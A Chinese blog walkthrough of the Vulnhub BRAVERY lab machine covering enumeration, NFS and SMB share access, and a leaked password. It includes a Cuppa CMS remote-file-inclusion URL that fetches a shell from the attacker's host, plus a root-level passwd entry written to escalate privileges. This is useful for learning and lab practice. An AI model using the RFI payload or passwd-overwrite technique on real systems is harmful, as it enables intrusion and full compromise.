• Vulnhub-靶机-DIGITALWORLD.LOCAL: BRAVERY


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

    地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

    nmap -n -p- -A 192.168.226.4 -o bravery.nmap

    nmap扫描结果

    发现开放了很多端口,大概都跟共享有关,有nfs,有smb,那么先看看nfs,通过Linux环境下查看nfs并挂载nfs到本地

    确认存在nfs目录/var/nfsshare ,那么将其挂载到本地kali环境下

    确认挂载没问题,查看下nfs目录下有啥东西

    根据上述信息可能存在明文密码,疑似密码就是qwertyuioplkjhgfdsazxcvbnm 我们先看看开放的端口445,这个是共享开的端口,我们使用enum4linux看看

    enum4linux 192.168.226.4 | tee bravery.smb

    根据上面信息,可知有匿名共享可以直接访问,还有个共享 //192.168.226.4/secured 不能访问,但发现有本地用户david和rick ,先看看匿名共享文件夹

    没发现啥有价值的信息,再回头看看上面的nfs挂载到本地的文件夹

    发现了上述关于用户david的访问日志,在此可推断极有可能上面提到的共享文件 //192.168.226.4/secured 是有关于david这个用户,密码就是尝试上述提供的明文密码试试

    成功登陆共享文件夹且获得上述重要信息,具体如下:

    依次点击了上述标记中的每个功能按钮发现了一个登陆窗口

    根据登陆窗口可以知道使用的是cuppa cms 我们在kali下搜索看看是否有可利用的漏洞

    还真有,我擦,直接搞到本地目录下看看对应的利用信息

    这里是存在本地和远程文件包含漏洞,那么方便使用的话就是通过本地kali搭建一个简易的web服务端,然后写好php脚本,直接利用远程文件包含,需要注意的时候这里的文件名是要txt扩展名,不要写php,测试有问题

    http://192.168.226.4/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.226.3:8855/shell.txt?

    反弹成功之后,找下提权的信息,发现cp存在-s权限,可以直接覆盖提权

    具体细节就不演示了,大概意思就是本地建立好含有uid为0的用户bmfx,这个用户密码是bmfx,然后将信息保存到passwd文件里面使用通过搭建简易web服务,在kali上下载passwd文件到目标靶机,然后使用cp命令覆盖提权

    echo 'bmfx:$1$bmfx$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> passwd

    成功提权

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Linux之C编译器gcc和makefile使用简介
    基于OWin的Web服务器Katana发布版本3
    OAuth和OpenID的区别
    关于 Token,你应该知道的十件事
    HTTP Header 详解
    Entity Framework教程及文章传送门
    CSP(Content Security Policy) 入门教程
    gulp构建工具的几个使用技巧
    浅谈程序员的英语学习
    如何选择正确的angular2学习曲线?
  • 原文地址:https://www.cnblogs.com/autopwn/p/13786382.html
Copyright © 2020-2023  润新知